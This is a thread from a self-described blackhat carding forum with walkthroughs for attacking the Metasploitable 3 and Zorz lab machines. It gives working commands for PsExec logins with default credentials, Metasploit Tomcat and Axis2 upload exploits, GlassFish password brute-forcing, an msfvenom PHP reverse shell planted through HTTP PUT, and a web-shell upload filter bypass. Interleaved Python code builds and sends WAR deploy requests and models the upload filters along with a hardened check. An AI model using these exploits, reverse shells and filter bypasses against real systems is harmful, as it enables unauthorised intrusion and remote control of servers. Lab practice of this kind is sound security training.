[Guide] How to Penetration Testing in Metasploitable 3 with SMB and Tomcat - Printable Version
Forum: Blackhat Carding Forum (https://bhcforums.cc), Carding Zone > Carders Home
Thread: https://bhcforums.cc/Thread-Guide-How-to-Penetration-Testing-in-Metasploitable-3-with-SMB-and-Tomcat
[Guide] How to Penetration Testing in Metasploitable 3 with SMB and Tomcat - NINZA - 04-25-2020

Target: Metasploitable 3
Attacker: Kali Linux

Let's begin by scanning the target IP to find the open ports and the services running on them. I am using nmap for scanning the target PC. Type the following command in a terminal on Kali Linux:

nmap -p- -sV 192.168.1.14

From the nmap result we can see that port 8282 is open for Apache Tomcat.

Open the target IP in a browser as 192.168.1.14:8282. Tomcat is running on port 8282, but the manager application requires credentials to access.

Now we are going to log in with PsExec over SMB (port 445).

PsExec.exe
PsExec.exe (Sysinternals) is a tool that lets us run processes on other computers in a network. It takes us directly to a shell on the remote PC without anything to set up manually. It needs an account that is a local administrator on the target, because it copies its service binary to the ADMIN$ share; on Metasploitable 3 the vagrant account is one. Download it from [To see content please register here] and unzip the archive once downloaded. It is a Windows binary, so run it from a Windows command prompt (from Kali, Impacket's psexec.py does the same job). Open a command prompt and type:

PsExec.exe \\192.168.1.14 -u vagrant -p vagrant cmd

This command addresses the host IP and the credentials which I have access to from my previous article, read it at [To see content please register here].
-u: username, vagrant
-p: password, vagrant
cmd: open the victim's command prompt

As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf. Change into that directory and type:

type tomcat-users.xml

As soon as the command executes you can see I have got credentials for Tomcat: username sploit and password sploit. Use these credentials for the attack using the Metasploit framework in Kali Linux.

Start the Metasploit framework by typing msfconsole in a terminal on Kali Linux. When Metasploit has loaded, type the commands given below for the Tomcat attack. This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application.
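What the PsExec step recovers and what tomcat_mgr_upload then does with it, as an added example that is not part of the original post or of Metasploit: the first two functions pull every account out of a tomcat-users.xml and keep those holding a manager-* role (the roles the manager application checks), the rest build a minimal WAR in memory and describe the deploy request. The sample XML, the roles on the sploit account, the tomcat/tomcat account, the placeholder JSP and the /demo context path are constructed for illustration. The deploy shown uses the manager's text interface (PUT /manager/text/deploy?path=...), which needs the manager-script role, rather than the /manager/html/upload form the module posts to.

```python
import base64
import http.client
import io
import xml.etree.ElementTree as ET
import zipfile

# Constructed sample in the shape of Tomcat 8's conf/tomcat-users.xml. The sploit/sploit
# account matches the page; its roles and the second account are assumptions.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="tomcat"/>
  <user username="sploit" password="sploit" roles="manager-gui,manager-script"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
</tomcat-users>
"""

# Roles the manager application accepts. manager-script is the one the text
# interface used below requires.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

# Harmless placeholder JSP; the Metasploit module would put its payload here (assumption).
PLACEHOLDER_JSP = b'<%= "deployed via manager" %>'


def parse_tomcat_users(xml_text):
    """Return [(username, password, set_of_roles)] for every <user>, with or without
    the default namespace. With a CredentialHandler configured the password
    attribute holds a digest rather than the clear-text value."""
    users = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.rsplit("}", 1)[-1] != "user":    # strip '{namespace}'
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        users.append((elem.get("username", ""), elem.get("password", ""), roles))
    return users


def manager_accounts(xml_text):
    """{username: (password, sorted manager roles)} for accounts that can reach
    the manager application, i.e. the ones tomcat_mgr_upload can use."""
    found = {}
    for username, password, roles in parse_tomcat_users(xml_text):
        hits = sorted(roles & MANAGER_ROLES)
        if hits:
            found[username] = (password, hits)
    return found


def build_war(jsp_source, entry_name="index.jsp"):
    """Minimal WAR: a zip with one JSP at its root (no web.xml needed on Tomcat 7+)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(entry_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Entry names inside a WAR, for checking what was built."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_request(host, port, context_path, war_bytes, username, password):
    """Method, target and headers for the manager text-interface deploy:
    the WAR is the body of PUT /manager/text/deploy?path=<context>."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = {
        "Host": f"{host}:{port}",
        "Authorization": "Basic " + token,
        "Content-Type": "application/octet-stream",
        "Content-Length": str(len(war_bytes)),
    }
    return "PUT", f"/manager/text/deploy?path={context_path}", headers


def send_deploy(host, port, context_path, war_bytes, username, password, timeout=10):
    """Perform the deploy against a lab host; returns (status, response text)."""
    method, target, headers = deploy_request(host, port, context_path, war_bytes, username, password)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request(method, target, body=war_bytes, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


if __name__ == "__main__":
    for name, (pw, roles) in manager_accounts(SAMPLE_TOMCAT_USERS).items():
        print(f"manager account {name}:{pw} roles={','.join(roles)}")
    war = build_war(PLACEHOLDER_JSP)
    print(deploy_request("192.168.1.14", 8282, "/demo", war, "sploit", "sploit"))
    # lab run: send_deploy("192.168.1.14", 8282, "/demo", war, "sploit", "sploit")
    # then fetch http://192.168.1.14:8282/demo/index.jsp
```

The manager replies "OK - Deployed application at context path /demo" on success and "FAIL - ..." with the reason otherwise; a 401 or 403 means the account lacks manager-script or the manager's RemoteAddrValve is blocking the source address.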
The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: the compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > set rhost 192.168.1.14
msf exploit(tomcat_mgr_upload) > set rport 8282
msf exploit(tomcat_mgr_upload) > set HttpUsername sploit
msf exploit(tomcat_mgr_upload) > set HttpPassword sploit
msf exploit(tomcat_mgr_upload) > exploit

Wonderful!!! Our Meterpreter session is opened and you have got the victim's shell.

meterpreter > sysinfo

Another way to exploit your target: this module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands by deploying a malicious web service via SOAP. The module defaults to the Axis2 admin credentials admin/axis2; if the target has changed them, set USERNAME and PASSWORD.

msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set rhost 192.168.1.14
msf exploit(axis2_deployer) > set rport 8282
msf exploit(axis2_deployer) > exploit

Awesome!!! A Meterpreter session is opened again and you have got the victim's shell once more.

meterpreter > sysinfo
meterpreter > getuid

Target: Metasploitable 3
Attacker: Kali Linux

Use nmap for scanning the target PC. nmap will show all available open ports and their running services. Type the following command in a terminal on Kali Linux for an aggressive scan:

nmap -p- -A 192.168.1.14

Open the target IP in a browser on one of the unknown ports, 4848, as 192.168.1.14:4848.

Start the Metasploit framework by typing msfconsole in a terminal on Kali Linux. When Metasploit has loaded, type the commands given below for the attack. This module attempts to log in to a GlassFish instance using username and password combinations indicated by the USER_FILE, PASS_FILE and USERPASS_FILE options. It will also try an authentication bypass against older versions of GlassFish.
Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option to true and SSLVersion to TLS1. It also needs Secure Admin enabled to access the DAS remotely.

msf > use auxiliary/scanner/http/glassfish_login
msf auxiliary(glassfish_login) > set rhosts 192.168.1.14
msf auxiliary(glassfish_login) > set rport 4848
msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true
msf auxiliary(glassfish_login) > set user_file /root/Desktop/user.txt
msf auxiliary(glassfish_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(glassfish_login) > exploit

After a few attempts we successfully have our login for GlassFish as admin:sploit.

Let us use these credentials which we got from Metasploit and open the target IP in a browser; I am using 192.168.1.14:4848/common/index.php. This URL opens the administration console, which asks for a username and password; use admin and sploit as username and password respectively.

With these credentials we have breached the admin console and got the GlassFish console, a page consisting of several common tasks.

Target: Metasploitable 3
Attacker: Kali Linux

Scan the target IP to find the open ports and the services running on them. I am using nmap for scanning the target PC. Type the following command in a terminal on Kali Linux:

nmap -p- 192.168.1.14

As you can see it shows multiple unknown open ports, but we are not able to identify the services running on them: without -sV, nmap only labels each port with the name from its nmap-services table, which says nothing about what is actually listening.

Open the target IP in a browser on one of the unknown ports, 8585, as 192.168.1.14:8585.

Under this URL I got directories like uploads and wordpress; let's penetrate inside. Type the following URL in the browser:

192.168.1.14:8585/uploads/

Now we are inside the uploads directory, but it shows nothing special.
Since nmap fails to give complete detail about the open ports, I will now scan the target IP again using Nikto against the open port, specifying the uploads directory. Type the following command in the terminal:

nikto -h [To see content please register here]

Nikto scans a web server and checks for server configuration items such as the presence of multiple index files and the HTTP methods the server allows. It shows that in the uploads directory the HTTP PUT method allows clients to save files on the web server, which means I can upload a file to the server; this can become part of an attack by uploading a malicious file as a backdoor on the web server.

Install the Poster plug-in from Firefox add-ons. Poster lets you perform HTTP requests with methods such as GET, POST, PUT and DELETE. (Poster is a legacy add-on that current Firefox versions no longer load; curl -T shel.php <url> sends the same PUT from the command line.)

Prepare the malicious file that you will upload with msfvenom. LHOST is the attacker's Kali address, the same one the handler below listens on, not the target:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with a .php extension. I saved the backdoor as shel.php on the desktop and will later browse to this file through Poster to upload it to the web server.

Click on Tools in the menu bar, then click on Poster in the drop-down menu. A dialog box will open. Here, browse to the file that you will upload and click the PUT option. This confirms that PUT is allowed, which means you can upload through it. It will show you that the file is uploaded and display the complete result including the response headers. You can see the same in your browser: the file has been uploaded (in our case the file is shel.php).

Simultaneously, open Metasploit and use multi/handler:

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.12
set lport 4444
exploit

After hitting enter, run the file you just uploaded by opening it in the browser. It will give you a Meterpreter session.

Zorz is another VM that will challenge your web app skills.
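Before moving on to Zorz, the PUT finding on port 8585 above as an added example that is not part of the original post or of Nikto: the client functions do what Nikto's method check and Poster's PUT do (read the Allow header from an OPTIONS request, then PUT a file and read it back), and the handler class is a constructed stand-in for the misconfigured server so the whole thing runs offline on localhost. The /uploads/ path, the in-memory storage and the marker file (a harmless text file, not a shell) are assumptions for illustration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class PutAllowedHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the server on port 8585: it advertises and honours
    PUT under /uploads/. Uploaded bodies are kept in memory (assumption)."""
    storage = {}

    def _reply(self, status, body=b"", extra=None):
        self.send_response(status)
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if body:
            self.wfile.write(body)

    def do_OPTIONS(self):
        # The Allow header is what Nikto reports as "HTTP method PUT allows clients to save files".
        self._reply(200, extra={"Allow": "GET, HEAD, POST, OPTIONS, PUT, DELETE"})

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        self.storage[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.storage.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)

    def log_message(self, *args):  # silence per-request logging
        pass


def allowed_methods(host, port, path="/uploads/"):
    """Methods listed in the OPTIONS Allow header for the directory."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return {m.strip().upper() for m in resp.getheader("Allow", "").split(",") if m.strip()}


def put_file(host, port, path, data):
    """The upload step Poster performs: PUT the file body to the chosen URL."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("PUT", path, body=data,
                 headers={"Content-Type": "application/octet-stream",
                          "Content-Length": str(len(data))})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def fetch(host, port, path):
    """GET the uploaded resource back; returns (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body


def demo():
    """Start the constructed target on an ephemeral port, probe it, upload a
    marker file and read it back. Returns the observations."""
    server = HTTPServer(("127.0.0.1", 0), PutAllowedHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        methods = allowed_methods("127.0.0.1", port)
        status = put_file("127.0.0.1", port, "/uploads/put-test.txt", b"put-test")
        readback = fetch("127.0.0.1", port, "/uploads/put-test.txt")
    finally:
        server.shutdown()
        server.server_close()
    return {"put_allowed": "PUT" in methods, "put_status": status, "readback": readback}


if __name__ == "__main__":
    print(demo())
```

Against a real host, point allowed_methods and put_file at it and check for 201/204 on the PUT; a 405 means the method is not accepted for that path. On Apache the usual fix is to deny PUT and DELETE for the directory with a <Limit> block or to not load the module that implements them.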
There are 3 separate challenges (web pages) on this machine. It should be pretty straightforward, and will probably test your web app skills once again. There are 3 different pages that you should focus on (you will see). Your goal is to successfully upload a web shell or malicious file to the server. This machine (Zorz) does not run on VMware, so if you are using Kali Linux in VMware for attacking, you will probably need to run Zorz on a different system in VirtualBox, and of course on the same network. You can download this machine from here: [To see content please register here]

Penetration Methodologies:
Let's start with our all-time favourite netdiscover to get the victim machine's IP.

netdiscover

So our target is located on 192.168.1.8. Let's quickly do an nmap scan to get an idea of the open ports.

nmap -A 192.168.1.8

OK, so we have ports 22 and 80 open. Let's visit the IP in our browser. It opens like a beautiful treasure! As you can see, according to this web page "Contact Support" lets us attach a file and discuss our problem. So here is what we did: go to /usr/share/webshells/php/php-reverse-shell.php, open it in a text editor, set the listening IP and port, save the file (php-reverse-shell.php; level 1 applies no filter), and start netcat on the listening port:

nc -lvp 1234

Next we upload this file and our shell is uploaded successfully. But we have no idea where our file lands on the server. To find the location of our shell, we run dirb with the wordlist /usr/share/dirb/wordlists/big.txt:

dirb [To see content please register here] /usr/share/dirb/wordlists/big.txt

We learn of a directory named "uploads2". Visiting it, we do not find our shell.php file there, so we try manipulating the directory name and visit "uploads1". Click the php file to open it. We have successfully exploited the level 1 security and have a netcat session running right before us.

Now let's go for the second level (Zorz Image Uploader 2) and try uploading the same file there. This time we get an error: here we can only upload images with a .jpg, .png or .gif extension.

Time for some more tricks. Open the php-reverse-shell.php file in a text editor and, just before the script, add the string "GIF89a" (the GIF file signature), then rename the file "php-reverse-shell.php.jpg" and try uploading it once again.
This time it uploads successfully! Time to execute the backdoor; this time our file is in "uploads2". Let's open it. As you can observe, we again get a new netcat session and have compromised the victim's VM.

nc -lvp 1234

Now for our final task, open the third level (Zorz Image Uploader 3) to upload the backdoor. Here a note clearly states the accepted file types: the uploaded file should be an image with a .jpeg, .jpg or .png extension and smaller than 100 KB. Without any further edits to our "php-reverse-shell.php.jpg" file, we upload it here, and it uploads successfully once again; this time the directory is uploads3. Visit the /uploads3 directory to execute the uploaded backdoor and obtain a netcat session once more.

nc -lvp 1234

Mission accomplished. We have successfully bypassed all three levels of security on this machine. All three levels trust the client-supplied filename, and the server executes PHP inside the upload directories; checking only the final extension, or only a magic prefix, is not enough once the web server will run whatever is stored there.
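The three Zorz filters and the "GIF89a" plus double-extension trick from the write-up, as an added example that is not part of the original post or of the Zorz VM: level2_check and level3_check model a final-extension whitelist plus an image-signature check (with the 100 KB limit at level 3), which the polyglot passes, and hardened_check shows what additionally has to be tested to reject it. The filter logic is my reconstruction from the behaviour described, not Zorz's code; the PHP stub and the JPEG fragment are constructed inputs.

```python
import os

# Constructed stand-in for php-reverse-shell.php (only the open tag matters here).
PHP_SHELL_STUB = b"<?php /* constructed stand-in for php-reverse-shell.php */ ?>"

# The level-2 bypass: GIF signature in front, extension whitelist satisfied by the last suffix.
POLYGLOT_NAME = "php-reverse-shell.php.jpg"
POLYGLOT_BODY = b"GIF89a" + PHP_SHELL_STUB

# A constructed JPEG fragment (SOI marker plus the start of an APP0/JFIF segment).
JPEG_NAME = "photo.jpg"
JPEG_BODY = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
ANY_IMAGE_MAGIC = tuple(m for prefixes in MAGIC.values() for m in prefixes)
MAX_SIZE = 100 * 1024


def level2_check(filename, body):
    """Reconstruction of uploader 2: last extension in the whitelist and the body
    starts with some image signature. name.php.jpg + GIF89a satisfies both."""
    ext = os.path.splitext(filename.lower())[1]
    return ext in ALLOWED_EXT and body.startswith(ANY_IMAGE_MAGIC)


def level3_check(filename, body):
    """Reconstruction of uploader 3: level 2 plus the 'less than 100kb' rule."""
    return level2_check(filename, body) and len(body) < MAX_SIZE


def hardened_check(filename, body):
    """What the upload handler should verify: exactly one extension, the magic
    bytes must match that extension, and no PHP open tag anywhere in the body.
    Storing uploads where the web server will not execute them is still required."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:        # rejects name.php.jpg and .jpg
        return False
    ext = "." + parts[1]
    if ext not in ALLOWED_EXT or len(body) >= MAX_SIZE:
        return False
    if not body.startswith(MAGIC[ext]):        # GIF89a inside a .jpg is a mismatch
        return False
    if b"<?" in body:                          # covers <?php and short open tags
        return False
    return True


def evaluate(filename, body):
    """Run one upload through all three checks."""
    return {
        "level2": level2_check(filename, body),
        "level3": level3_check(filename, body),
        "hardened": hardened_check(filename, body),
    }


if __name__ == "__main__":
    print(POLYGLOT_NAME, evaluate(POLYGLOT_NAME, POLYGLOT_BODY))
    print(JPEG_NAME, evaluate(JPEG_NAME, JPEG_BODY))
```

Rejecting the double extension and checking signature-to-extension consistency stops the write-up's file, but a genuine JPEG with PHP hidden in a comment segment still carries the "<?" bytes, which is why the body scan is there too; the decisive control remains that nothing under the upload directories is handed to the PHP interpreter.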